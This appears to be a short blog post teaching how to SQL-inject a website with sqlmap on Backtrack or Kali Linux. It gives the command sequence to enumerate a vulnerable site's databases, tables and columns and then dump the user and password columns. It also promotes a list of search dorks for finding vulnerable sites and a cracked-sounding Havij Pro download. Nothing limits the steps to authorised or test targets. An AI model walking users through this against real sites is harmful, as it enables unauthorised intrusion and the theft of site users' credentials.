How To SQL Inject a Website in Backtrack or Kali Linux

How To SQL Inject a Website in Backtrack or Kali Linux

What we need: 
1. Backtrack or Kali Linux with SQLMAP preinstalled
2. An Sql injection Vulnerable website 

1.First locate SQLMAP : backtrack,web exploitation tools,SQL MAP

2.Then Type Python sqlmap.py -u "target website url here" --dbs

Note: "-u" is For Target URL and "--dbs" is For Databse
Hit ENTER
You will Get a Number of Databases

2.Now type python sqlmap.py -u "target website url here" -D "database to extract"
--tables

Note: here -D is for selected database and --tables is for tables to extract
Now You Will Get a List of tables what you searched for.

3.Now type Python sqlmap.py -u "target url" -D " selected Database" -T "selected Table" --columns
Note: here -T is for selected table which is admin and --columns is for columns to extract.

4.Now type Python sqlmap.py -u "target url" -D " selected Database" -T "selected Table" -C "selected Column" --dump
Note here -C is for selected Column and --dump is for dumping all data in that column

Now You Will Get your result : of Python sqlmap.py -u "target url" -D " selected Database" -T "selected Table" -C user --dump

Now You Will Get your result : of Python sqlmap.py -u "target url" -D " selected Database" -T "selected Table" -C password --dump

8500+ SQL Dorks List

Download Havij 1.16 Pro Portable Sql Injection Tool For Windows

I Hope You Like This Post 



No comments :

Post a Comment